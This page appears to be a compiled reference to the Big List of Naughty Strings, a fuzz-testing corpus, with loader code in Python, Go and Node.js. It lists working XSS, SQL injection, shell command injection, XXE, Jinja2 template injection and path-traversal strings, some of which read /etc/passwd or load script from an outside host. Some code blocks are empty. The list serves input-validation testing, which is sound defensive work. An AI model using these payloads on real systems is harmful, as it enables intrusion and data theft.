### XSS Attempt with Script Tag and Unquoted Attributes Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt This example injects a script by using unquoted attributes in an img tag, followed by a script tag to execute JavaScript. ```html "> ``` -------------------------------- ### Load Naughty Strings from Local File in Python Source: https://context7.com/minimaxir/big-list-of-naughty-strings/llms.txt Use the naughtystrings Python library to load strings from the local blns.txt file. Demonstrates default loading and loading from a custom filepath. Includes an example of testing a Django form field. ```python import sys sys.path.insert(0, 'naughtystrings') from naughtystrings import naughty_strings # Default: reads from the bundled blns.txt strings = naughty_strings() print(f"Loaded {len(strings)} strings") # Loaded 507 strings # First entry is always an empty string assert strings[0] == "" # Custom file path strings_custom = naughty_strings(filepath='/path/to/my/blns.txt') # Example: test a Django form field from django.test import TestCase from myapp.forms import ProfileForm class NaughtyStringFormTest(TestCase): def test_username_field(self): for s in naughty_strings(): form = ProfileForm(data={'username': s}) # Should never raise an uncaught exception try: form.is_valid() except Exception as e: self.fail(f"Form raised {type(e).__name__} for input: {repr(s)}") ``` -------------------------------- ### Filter Category Headers in blns.txt Source: https://context7.com/minimaxir/big-list-of-naughty-strings/llms.txt Use grep to filter and display all category headers from the blns.txt file. Lines starting with '#' are considered comments and headers. ```bash # View all category headers grep '^#' blns.txt ``` -------------------------------- ### XSS Attempt with onmouseover Event Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt These examples trigger JavaScript alerts using the 'onmouseover' event handler in img tags, with and without a src attribute. ```html ``` ```html ``` ```html ``` -------------------------------- ### Get Base64 Encoded Naughty Strings in Go Source: https://context7.com/minimaxir/big-list-of-naughty-strings/llms.txt Returns a Go slice of strings where each element is the base64-encoded version of a naughty string. Useful for testing decoders and systems that accept base64 input. ```go package mypackage_test import ( "encoding/base64" "testing" "github.com/minimaxir/big-list-of-naughty-strings/naughtystrings" ) func TestBase64DecoderRobustness(t *testing.T) { for _, enc := range naughtystrings.Base64Encoded() { raw, err := base64.StdEncoding.DecodeString(enc) if err != nil { t.Fatalf("Unexpected base64 decode error: %v", err) } // Feed decoded bytes into your system if err := ProcessRawBytes(raw); err != nil { t.Logf("Handled error for input %q: %v", string(raw), err) } } } ``` -------------------------------- ### XSS Attempt with Conditional Comment and Image onerror Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt This example uses an IE conditional comment to embed an img tag with an onerror handler, aiming to execute JavaScript. ```html ``` -------------------------------- ### XSS Attempt with Whitespace in JavaScript URL Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt These examples attempt to execute JavaScript by including whitespace characters within the 'javascript:' URL in the img tag's src attribute. ```html ``` ```html ``` ```html ``` ```html ``` -------------------------------- ### XSS Attempt with Nested Script Tag in Image Source Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt This example attempts to inject a script tag by nesting it within the 'src' attribute of an img tag, potentially bypassing filters. ```html " `> ``` -------------------------------- ### Get Unencoded Naughty Strings in Go Source: https://context7.com/minimaxir/big-list-of-naughty-strings/llms.txt Returns a Go slice of strings containing all entries from blns.json. This function is safe for concurrent use as the data is loaded at package init time. ```go package mypackage_test import ( "testing" "github.com/minimaxir/big-list-of-naughty-strings/naughtystrings" ) func TestHandleInputWithNaughtyStrings(t *testing.T) { for _, s := range naughtystrings.Unencoded() { result, err := HandleUserInput(s) if err != nil { // Validation errors are acceptable; panics/crashes are not continue } if result == nil { t.Errorf("HandleUserInput returned nil for input: %q", s) } } } ``` -------------------------------- ### XSS Attempt with Nested Image Tag in Anchor Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt This example attempts to inject an img tag with an onerror handler within the href attribute of an anchor tag, using backticks for obfuscation. ```html `"> ``` -------------------------------- ### XSS Attempt with Hex Encoded Whitespace in onerror Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt These examples inject JavaScript by using hex-encoded whitespace characters before the onerror handler's value in an img tag. ```html ``` ```html ``` ```html ``` ```html ``` ```html ``` ```html ``` -------------------------------- ### XSS Attempt with Hex Encoded Characters in Image Source Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt These examples use hexadecimal-encoded characters within the 'src' attribute of an img tag to obfuscate the payload and trigger JavaScript execution. ```html ``` ```html ``` ```html ``` ```html ``` ```html ``` ```html ``` ```html ``` ```html ``` ```html ``` ```html ``` ```html ``` ```html ``` ```html ``` ```html ``` ```html ``` ```html ``` ```html ``` ```html ``` ```html ``` ```html ``` ```html ``` ```html ``` ```html ``` ```html ``` ```html ``` ```html ``` -------------------------------- ### Regenerate blns.base64.txt from blns.txt using Bash Source: https://context7.com/minimaxir/big-list-of-naughty-strings/llms.txt A Bash script to regenerate blns.base64.txt by base64 encoding non-comment, non-empty lines from blns.txt. This script preserves comments and blank lines. ```bash # From the repository root bash scripts/texttobase64.sh > blns.base64.txt # Inspect a few encoded entries head -30 blns.base64.txt # Example output (comments preserved, strings encoded): # Reserved Strings # # Strings which may be used elsewhere in code # dW5kZWZpbmVk <- "undefined" bW5kZWY= <- "undef" bbnVsbA== <- "null" ``` -------------------------------- ### Command Injection (Ruby) Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt Strings designed to execute system commands within Ruby/Rails applications. ```ruby eval("puts 'hello world'") ``` ```ruby System("ls -al /") ``` ```ruby `ls -al /` ``` ```ruby Kernel.exec("ls -al /") ``` ```ruby Kernel.exit(1) ``` ```ruby %x('ls -al /') ``` -------------------------------- ### Basic XSS Script Injection Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt Demonstrates direct injection of a script tag to execute JavaScript. This is a fundamental XSS payload. ```html ``` -------------------------------- ### Iterate Naughty Strings in Node.js Source: https://context7.com/minimaxir/big-list-of-naughty-strings/llms.txt Load the blns.json file in Node.js and iterate through each string, processing it with a hypothetical myInputProcessor function. Logs success or failure with error messages. ```javascript // Node.js: load and iterate all naughty strings const blns = require('./blns.json'); for (const str of blns) { try { const result = myInputProcessor(str); console.log(`OK: ${JSON.stringify(str).slice(0, 60)}`); } catch (err) { console.error(`FAIL [${err.message}]: ${JSON.stringify(str).slice(0, 60)}`); } } ``` -------------------------------- ### XSS Attempt with oncopy Event Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt This string attempts to execute JavaScript using the 'oncopy' event handler. ```html Copy me ``` -------------------------------- ### XSS Attempt with Commented Out Code Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt This string attempts to execute JavaScript by using commented-out code followed by an alert. ```html \";alert('223');// ``` -------------------------------- ### Regenerate blns.json from blns.txt using Python Source: https://context7.com/minimaxir/big-list-of-naughty-strings/llms.txt This script regenerates the blns.json file from blns.txt. Run it after modifying blns.txt to ensure the JSON file is up-to-date. It handles comments, blank lines, and Unicode characters. ```bash # From the repository root cd scripts python txt_to_json.py # Writes updated ../blns.json # Verify the output python -c "import json; d=json.load(open('../blns.json')); print(len(d), 'strings'); print('First:', repr(d[0])); print('Sample:', repr(d[5]))" # 507 strings # First: '' # Sample: 'null' ``` -------------------------------- ### XXE Injection (XML) Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt This XML string can reveal system files when parsed by a misconfigured XML parser. ```xml ]>&xxe; ``` -------------------------------- ### XSS Attempt with onwheel Event Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt This string attempts to execute JavaScript using the 'onwheel' event handler. ```html Scroll over me ``` -------------------------------- ### Known CVEs and Vulnerabilities Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt Strings that test for known vulnerabilities, such as the Shellshock vulnerability. ```shell () { 0; }; touch /tmp/blns.shellshock1.fail; ``` ```shell () { _; } >_[$($())] { touch /tmp/blns.shellshock2.fail; } ``` ```plaintext <<< %s(un='%s') = %u ``` ```plaintext +++ATH0 ``` -------------------------------- ### Load and Validate Naughty Strings in Python Source: https://context7.com/minimaxir/big-list-of-naughty-strings/llms.txt Load the blns.json file in Python using the json module. Iterates through the strings and validates them using a hypothetical validate_input function, asserting that the result is never None. ```python import json with open('blns.json', 'r', encoding='utf-8') as f: naughty_strings = json.load(f) print(f"Total strings: {len(naughty_strings)}") # Total strings: 507 (approximate; list grows over time) for s in naughty_strings: result = validate_input(s) assert result is not None, f"Unexpected None for input: {repr(s)}" ``` -------------------------------- ### Server Code Injection Strings Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt These strings can lead to arbitrary code execution on the server, potentially as a privileged user. ```shell /dev/null; touch /tmp/blns.fail ; echo ``` ```shell `touch /tmp/blns.fail` ``` ```shell $(touch /tmp/blns.fail) ``` ```ruby @{[system "touch /tmp/blns.fail"]} ``` -------------------------------- ### JavaScript Event Handler with Pseudo-Protocol (Base64 Encoded) Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.base64.txt This Base64 encoded string uses a 'javascript:' pseudo-protocol within an event handler like 'onkeyup'. It tests if the system correctly identifies and blocks such attempts to execute JavaScript directly. ```javascript IiBhdXRvZm9jdXMgb25rZXl1cD0iamF2YXNjcmlwdDphbGVydCgxMjMp ``` ```javascript JyBhdXRvZm9jdXMgb25rZXl1cD0namF2YXNjcmlwdDphbGVydCgxMjMp ``` -------------------------------- ### Count Total Strings in blns.txt Source: https://context7.com/minimaxir/big-list-of-naughty-strings/llms.txt Count the total number of non-comment and non-blank lines in the blns.txt file. This provides a quick way to verify the number of test strings. ```bash # Count total strings (excluding comments and blank lines) grep -v '^#' blns.txt | grep -v '^$' | wc -l ``` -------------------------------- ### XSS Attempt with Unclosed Image Tag Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt This string attempts to execute JavaScript by using an unclosed img tag with a javascript: URL. ```html ``` -------------------------------- ### XSS via String Termination and Injection Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt Tests XSS by terminating a string literal with a quote and semicolon, followed by script execution. This payload includes variations for different string termination characters. ```html ";alert(15);t=" ``` ```html ';alert(16);t=' ``` -------------------------------- ### XSS Attempt with Title PropertyChange and Empty Title Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt This string exploits the 'onpropertychange' event of a title tag, combined with an empty title attribute, to execute JavaScript. ```html ``` -------------------------------- ### XSS via Comment and Script Injection Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt Injects a script tag immediately after an HTML comment delimiter (`-->`), which can be used to execute scripts in contexts where comments are allowed. ```html --><script>alert(14)</script> ``` -------------------------------- ### File Inclusion Strings Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt These strings can cause a web server to include unintended files, potentially leading to information disclosure. ```plaintext ../../../../../../../../../../../../etc/passwd%00 ``` ```plaintext ../../../../../../../../../../../../etc/hosts ``` -------------------------------- ### XSS via JavaScript URI in String Context Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt Injects a `javascript:` URI within a string context, often seen in attribute values or variable assignments, to trigger script execution. ```html JavaSCript:alert(17) ``` ```html ;alert(18); ``` ```html src=JaVaSCript:prompt(19) ``` -------------------------------- ### XSS Attempt with Bracket Notation and Obfuscated Alert Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt This string uses bracket notation for attribute access and obfuscates the alert call within an img tag's onerror handler. ```html <img[a][b][c]src[d]=x[e]onerror=[f]"alert(192)"> ``` -------------------------------- ### XSS Attempt with Script Tag and Unicode Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt This string attempts to inject a JavaScript alert using a script tag with a non-breaking space character. ```html "`'><script>\xC2\xA0javascript:alert(164)</script> ``` -------------------------------- ### XSS Attempt with Shortened Script URL Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt This string attempts to inject a script by using a shortened URL in the script tag's src attribute. ```html <SCRIPT SRC=//ha.ckers.org/.j> ``` -------------------------------- ### XSS via Nested Script Tags Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt Attempts to execute JavaScript by embedding a script tag within another script tag, potentially confusing parsers. ```html <sc<script>ript>alert(13)</sc</script>ript> ``` -------------------------------- ### XSS via JavaScript Event Handler with Quotes Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt Tests XSS by triggering JavaScript execution through event handlers like `onkeyup` using `javascript:` URIs. Includes variations with different quote types and the `autofocus` attribute. ```html " autofocus onkeyup="javascript:alert(23) ``` ```html ' autofocus onkeyup='javascript:alert(24) ``` -------------------------------- ### Extract SQL Injection Strings using Python Source: https://context7.com/minimaxir/big-list-of-naughty-strings/llms.txt This Python script extracts only the SQL injection strings from blns.txt. It reads the file line by line, identifies the SQL Injection section, and collects relevant strings. ```python # Extract only SQL injection strings for targeted testing import re sql_strings = [] in_section = False with open('blns.txt', 'r', encoding='utf-8') as f: for line in f: line = line.rstrip('\n') if re.match(r'#\s*SQL Injection', line): in_section = True continue if in_section and line.startswith('#') and 'SQL' not in line: break if in_section and line and not line.startswith('#'): sql_strings.append(line) print(sql_strings) # ["1;DROP TABLE users", "1'; DROP TABLE users-- 1", "' OR 1=1 -- 1", ...] ``` -------------------------------- ### Perl Script for XSS Injection Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt This Perl one-liner generates an img tag with a null-byte-separated JavaScript URL, intended for XSS testing. ```perl perl -e 'print "<IMG SRC=java\0script:alert(\"218\")>";' > out ``` -------------------------------- ### XSS Attempt with Nested Script Tags Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt This string attempts to execute JavaScript by nesting script tags, potentially bypassing filters. ```html <<SCRIPT>alert("221");//<</SCRIPT> ``` -------------------------------- ### XSS Attempt with Script Tag and Path Traversal Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt This string attempts to inject a script by using a path-like structure in the script tag's src attribute, potentially bypassing filters. ```html <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> ``` ```html <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> ``` -------------------------------- ### XSS Attempt with Plaintext and Script Tag Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt This string attempts to execute JavaScript by embedding a script tag within a plaintext element, followed by a textarea. ```html <plaintext> http://a/%%30%30 </textarea><script>alert(225)</script> ``` -------------------------------- ### XSS via Script Tag Closure and Reopening Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt Attempts to bypass filters by closing an existing script tag and immediately opening a new one to inject malicious code. ```html </script><script>alert(7)</script> ``` -------------------------------- ### XSS Attempt with Malformed Image Tag and Comment Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt This string uses a malformed img tag with an onerror attribute and a comment to execute JavaScript. ```html <img src=x onerror=/" '"= alt=javascript:alert(201)//"> ``` -------------------------------- ### XSS Attempt with Conditional Comment and Script Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt This string uses an IE conditional comment to hide a script tag, which then attempts to execute JavaScript. ```html <!--[if]><script>javascript:alert(204)</script --> ``` -------------------------------- ### SQL Injection Strings Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt These strings can be used to exploit SQL injection vulnerabilities if user inputs are not properly sanitized. ```sql 1;DROP TABLE users ``` ```sql 1'; DROP TABLE users-- ``` ```sql ' OR 1=1 -- 1 ``` ```sql ' OR '1'='1 ``` ```sql '; EXEC sp_MSForEachTable 'DROP TABLE ?'; -- ``` -------------------------------- ### Obfuscated Script Execution within Script Tag (Base64 Encoded) Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.base64.txt This Base64 encoded string attempts to execute JavaScript within a script tag, using obfuscated characters like \x3C and \x3E. It tests for vulnerabilities in script tag parsing and execution. ```html J2AiPjxceDNDc2NyaXB0PmphdmFzY3JpcHQ6YWxlcnQoMSk8L3NjcmlwdD4= ``` ```html J2AiPjxceDAwc2NyaXB0PmphdmFzY3JpcHQ6YWxlcnQoMSk8L3NjcmlwdD4= ``` -------------------------------- ### XSS Attempt with Decimal Character Code Encoded JavaScript URL Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt This string executes JavaScript by encoding 'javascript:alert()' using decimal character codes within the img tag's src attribute. ```html <IMG SRC=javascript:alert('211')> ``` ```html <IMG SRC=javascript:alert('212')> ``` -------------------------------- ### Script Injection with Malformed Attributes (Base64 Encoded) Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.base64.txt These Base64 encoded strings attempt script injection by using malformed or unusual attribute values, often involving quotes and semicolons. They test the robustness of attribute parsing and sanitization. ```html IjthbGVydCgxMjMpO3Q9Ig== ``` ```html JzthbGVydCgxMjMpO3Q9Jw== ``` ```html SmF2YVNDcmlwdDphbGVydCgxMjMp ``` ```html O2FsZXJ0KDEyMyk7 ``` ```html c3JjPUphVmFTQ3JpcHQ6cHJvbXB0KDEzMik= ``` ```html Ij48c2NyaXB0PmFsZXJ0KDEyMyk7PC9zY3JpcHQgeD0i ``` ```html Jz48c2NyaXB0PmFsZXJ0KDEyMyk7PC9zY3JpcHQgeD0n ``` ```html PjxzY3JpcHQ+YWxlcnQoMTIzKTs8L3NjcmlwdCB4PQ== ``` -------------------------------- ### XSS via Script Injection with Extra Attributes Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt Injects script tags while including additional attributes, testing how parsers handle malformed or extended tag structures. ```html "><script>alert(20);</script x=" ``` ```html '><script>alert(21);</script x=' ``` ```html ><script>alert(22);</script x= ``` -------------------------------- ### XSS Attempt with Script Tag and URL Encoded Variable Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt This string attempts to inject a script by referencing a script file using URL-encoded variables within the script tag's src attribute. ```html <script src="/\%(jscript)s"></script> ``` ```html <script src="\\%(jscript)s"></script> ``` -------------------------------- ### Jinja2 Injection Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt Strings designed to exploit Jinja2 templating engine, one causing a MemoryError and the other reading sensitive files. ```jinja2 {% print 'x' * 64 * 1024**3 %} ``` ```jinja2 {{ "".__class__.__mro__[2].__subclasses__()[40]("/etc/passwd").read() }} ``` -------------------------------- ### HTML Script Tag Injection with HTML Entities (Base64 Encoded) Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.base64.txt This string, encoded in Base64, represents an attempt to inject a script tag using HTML entities for angle brackets. It tests for vulnerabilities where HTML entities might be misinterpreted. ```html Jmx0O3NjcmlwdCZndDthbGVydCgmIzM5OzEyMyYjMzk7KTsmbHQ7L3NjcmlwdCZndDs= ``` -------------------------------- ### HTML Script Tag Injection (Base64 Encoded) Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.base64.txt This string is a Base64 encoded version of a script tag that attempts to execute an alert. It's used to test if a system properly decodes and sanitizes user input before rendering HTML. ```html PHNjcmlwdD5hbGVydCgxMjMpPC9zY3JpcHQ+ ``` -------------------------------- ### Anchor Tag with JavaScript Pseudo-Protocol (Base64 Encoded) Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.base64.txt These Base64 encoded strings use anchor tags with 'javascript:' pseudo-protocol in the href attribute. This tests for vulnerabilities where links might execute JavaScript when clicked or interacted with. ```html PGEgaHJlZj0iXHgwQmphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCgxKSIgaWQ9ImZ1enplbGVt ZW50MSI+dGVzdDwvYT4= ``` ```html PGEgaHJlZj0iXHgwRmphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCgxKSIgaWQ9ImZ1enplbGVt ZW50MSI+dGVzdDwvYT4= ``` ```html PGEgaHJlZj0iXHhDMlx4QTBqYXZhc2NyaXB0OmphdmFzY3JpcHQ6YWxlcnQoMSkiIGlkPSJmdXp6 ZWxlbWVudDEiPnRlc3Q8L2E+ ``` ```html PGEgaHJlZj0iXHgwNWphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCgxKSIgaWQ9ImZ1enplbGVt ZW50MSI+dGVzdDwvYT4= ``` ```html PGEgaHJlZj0iXHhFMVx4QTBceDhFamF2YXNjcmlwdDpqYXZhc2NyaXB0OmFsZXJ0KDEpIiBpZD0i ZnV6emVsZW1lbnQxIj50ZXN0PC9hPg== ``` ```html PGEgaHJlZj0iXHgxOGphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCgxKSIgaWQ9ImZ1enplbGVt ZW50MSI+dGVzdDwvYT4= ``` ```html PGEgaHJlZj0iXHgxMWphdmFzY3JpcHQ6amF2YXNjcmlwdDphbGVydCgxKSIgaWQ9ImZ1enplbGVt ZW50MSI+dGVzdDwvYT4= ``` ```html PGEgaHJlZj0iXHhFMlx4ODBceDg4amF2YXNjcmlwdDpqYXZhc2NyaXB0OmFsZXJ0KDEpIiBpZD0i ``` -------------------------------- ### Closing Tag Script Injection (Base64 Encoded) Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.base64.txt This Base64 encoded string attempts to inject a script by first closing an existing tag and then opening a script tag. It tests for vulnerabilities in tag parsing and attribute handling. ```html Ij48c2NyaXB0PmFsZXJ0KDEyMyk8L3NjcmlwdD4= ``` ```html Jz48c2NyaXB0PmFsZXJ0KDEyMyk8L3NjcmlwdD4= ``` ```html PjxzY3JpcHQ+YWxlcnQoMTIzKTwvc2NyaXB0Pg== ``` -------------------------------- ### Obfuscated Script Tag Injection (Base64 Encoded) Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.base64.txt This Base64 encoded string contains an obfuscated attempt to inject a script. It tests for vulnerabilities where simple pattern matching might fail due to the obfuscation techniques used. ```html PCAvIHNjcmlwdCA+PCBzY3JpcHQgPmFsZXJ0KDEyMyk8IC8gc2NyaXB0ID4= ``` -------------------------------- ### XSS via onfocus Event with JavaScript URI Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt Exploits the `onfocus` event handler using a `javascript:` URI. The `autofocus` attribute ensures the element receives focus automatically. Case variations in `javascript` are tested. ```html onfocus=JaVaSCript:alert(9) autofocus ``` ```html " onfocus=JaVaSCript:alert(10) autofocus ``` ```html ' onfocus=JaVaSCript:alert(11) autofocus ``` -------------------------------- ### XSS via Malformed Script Tags Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt These strings test for XSS vulnerabilities by injecting JavaScript into `<script>` tags, using various Unicode characters, control characters, and invalid characters. Proper script content sanitization is crucial. ```html "`'><script>\x3Bjavascript:alert(128)</script> ``` ```html "`'><script>\x0Djavascript:alert(129)</script> ``` ```html "`'><script>\xEF\xBB\xBFjavascript:alert(130)</script> ``` ```html "`'><script>\xE2\x80\x81javascript:alert(131)</script> ``` ```html "`'><script>\xE2\x80\x84javascript:alert(132)</script> ``` ```html "`'><script>\xE3\x80\x80javascript:alert(133)</script> ``` ```html "`'><script>\x09javascript:alert(134)</script> ``` ```html "`'><script>\xE2\x80\x89javascript:alert(135)</script> ``` ```html "`'><script>\xE2\x80\x85javascript:alert(136)</script> ``` ```html "`'><script>\xE2\x80\x88javascript:alert(137)</script> ``` ```html "`'><script>\x00javascript:alert(138)</script> ``` ```html "`'><script>\xE2\x80\xA8javascript:alert(139)</script> ``` ```html "`'><script>\xE2\x80\x8Ajavascript:alert(140)</script> ``` ```html "`'><script>\xE1\x9A\x80javascript:alert(141)</script> ``` ```html "`'><script>\x0Cjavascript:alert(142)</script> ``` ```html "`'><script>\x2Bjavascript:alert(143)</script> ``` ```html "`'><script>\xF0\x90\x96\x9Ajavascript:alert(144)</script> ``` ```html "`'><script>-javascript:alert(145)</script> ``` ```html "`'><script>\x0Ajavascript:alert(146)</script> ``` ```html "`'><script>\xE2\x80\xAFjavascript:alert(147)</script> ``` ```html "`'><script>\x7Ejavascript:alert(148)</script> ``` ```html "`'><script>\xE2\x80\x87javascript:alert(149)</script> ``` ```html "`'><script>\xE2\x81\x9Fjavascript:alert(150)</script> ``` ```html "`'><script>\xE2\x80\xA9javascript:alert(151)</script> ``` ```html "`'><script>\xC2\x85javascript:alert(152)</script> ``` ```html "`'><script>\xEF\xBF\xAEjavascript:alert(153)</script> ``` ```html "`'><script>\xE2\x80\x83javascript:alert(154)</script> ``` ```html "`'><script>\xE2\x80\x8Bjavascript:alert(155)</script> ``` ```html "`'><script>\xEF\xBF\xBEjavascript:alert(156)</script> ``` ```html "`'><script>\xE2\x80\x80javascript:alert(157)</script> ``` ```html "`'><script>\x21javascript:alert(158)</script> ``` ```html "`'><script>\xE2\x80\x82javascript:alert(159)</script> ``` ```html "`'><script>\xE2\x80\x86javascript:alert(160)</script> ``` ```html "`'><script>\xE1\xA0\x8Ejavascript:alert(161)</script> ``` ```html "`'><script>\x0Bjavascript:alert(162)</script> ``` ```html "`'><script>\x20javascript:alert(163)</script> ``` -------------------------------- ### JavaScript Event Handler Obfuscation (Base64 Encoded) Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.base64.txt This Base64 encoded string attempts to trigger JavaScript execution via an event handler like 'onfocus', using a 'javascript:' pseudo-protocol. It tests for vulnerabilities in event handler sanitization. ```javascript b25mb2N1cz1KYVZhU0NyaXB0OmFsZXJ0KDEyMykgYXV0b2ZvY3Vz ``` ```javascript IiBvbmZvY3VzPUphVmFTQ3JpcHQ6YWxlcnQoMTIzKSBhdXRvZm9jdXM= ``` ```javascript JyBvbmZvY3VzPUphVmFTQ3JpcHQ6YWxlcnQoMTIzKSBhdXRvZm9jdXM= ``` -------------------------------- ### XSS via JavaScript URI in href with Obfuscation Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt Tests XSS by using `javascript:` URIs in `href` attributes of anchor tags. This payload uses various non-standard whitespace characters and control characters to obfuscate the URI, potentially bypassing filters. ```html <a href="\x0Bjavascript:javascript:alert(61)" id="fuzzelement1">test</a> ``` ```html <a href="\x0Fjavascript:javascript:alert(62)" id="fuzzelement1">test</a> ``` ```html <a href="\xC2\xA0javascript:javascript:alert(63)" id="fuzzelement1">test</a> ``` ```html <a href="\x05javascript:javascript:alert(64)" id="fuzzelement1">test</a> ``` ```html <a href="\xE1\xA0\x8Ejavascript:javascript:alert(65)" id="fuzzelement1">test</a> ``` ```html <a href="\x18javascript:javascript:alert(66)" id="fuzzelement1">test</a> ``` ```html <a href="\x11javascript:javascript:alert(67)" id="fuzzelement1">test</a> ``` ```html <a href="\xE2\x80\x88javascript:javascript:alert(68)" id="fuzzelement1">test</a> ``` ```html <a href="\xE2\x80\x89javascript:javascript:alert(69)" id="fuzzelement1">test</a> ``` ```html <a href="\xE2\x80\x80javascript:javascript:alert(70)" id="fuzzelement1">test</a> ``` ```html <a href="\x17javascript:javascript:alert(71)" id="fuzzelement1">test</a> ``` ```html <a href="\x03javascript:javascript:alert(72)" id="fuzzelement1">test</a> ``` ```html <a href="\x0Ejavascript:javascript:alert(73)" id="fuzzelement1">test</a> ``` ```html <a href="\x1Ajavascript:javascript:alert(74)" id="fuzzelement1">test</a> ``` ```html <a href="\x00javascript:javascript:alert(75)" id="fuzzelement1">test</a> ``` ```html <a href="\x10javascript:javascript:alert(76)" id="fuzzelement1">test</a> ``` ```html <a href="\xE2\x80\x82javascript:javascript:alert(77)" id="fuzzelement1">test</a> ``` ```html <a href="\x20javascript:javascript:alert(78)" id="fuzzelement1">test</a> ``` ```html <a href="\x13javascript:javascript:alert(79)" id="fuzzelement1">test</a> ``` ```html <a href="\x09javascript:javascript:alert(80)" id="fuzzelement1">test</a> ``` ```html <a href="\xE2\x80\x8Ajavascript:javascript:alert(81)" id="fuzzelement1">test</a> ``` ```html <a href="\x14javascript:javascript:alert(82)" id="fuzzelement1">test</a> ``` ```html <a href="\x19javascript:javascript:alert(83)" id="fuzzelement1">test</a> ``` ```html <a href="\xE2\x80\xAFjavascript:javascript:alert(84)" id="fuzzelement1">test</a> ``` ```html <a href="\x1Fjavascript:javascript:alert(85)" id="fuzzelement1">test</a> ``` -------------------------------- ### Commented Script Injection (Base64 Encoded) Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.base64.txt This Base64 encoded string injects a script tag after an HTML comment. It tests if the comment is properly closed and if the subsequent script is executed. ```html LS0+PHNjcmlwdD5hbGVydCgxMjMpPC9zY3JpcHQ+ ``` -------------------------------- ### XSS Attempt with Character Code Encoded JavaScript URL Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt This string executes JavaScript by encoding the 'javascript:alert()' call using character codes within the img tag's src attribute. ```html <IMG SRC=javascript:alert(String.fromCharCode(50,48,55))> ``` -------------------------------- ### Unicode Obfuscation in Script Tag (Base64 Encoded) Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.base64.txt This Base64 encoded string uses Unicode characters within a script tag to attempt obfuscation. It tests if the system correctly handles or rejects such Unicode-based script injection attempts. ```html 77ycc2NyaXB077yeYWxlcnQoMTIzKe+8nC9zY3JpcHTvvJ4= ``` -------------------------------- ### XSS Attempt with HTML Entity Encoded JavaScript URL Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt This string attempts to execute JavaScript by encoding the 'javascript:' scheme using HTML entities within an anchor tag's href attribute. ```html <a href=java script:javascript:alert(199)>XXX</a> ``` -------------------------------- ### XSS via Malformed Image Tags Source: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt These strings test for XSS vulnerabilities by injecting JavaScript into the `onerror` attribute of an `img` tag, using various control characters and quotes. Ensure proper attribute escaping and sanitization. ```html "'><img src=xxx:x \x0Aonerror=javascript:alert(118)> ``` ```html "'><img src=xxx:x \x22onerror=javascript:alert(119)> ``` ```html "'><img src=xxx:x \x0Bonerror=javascript:alert(120)> ``` ```html "'><img src=xxx:x 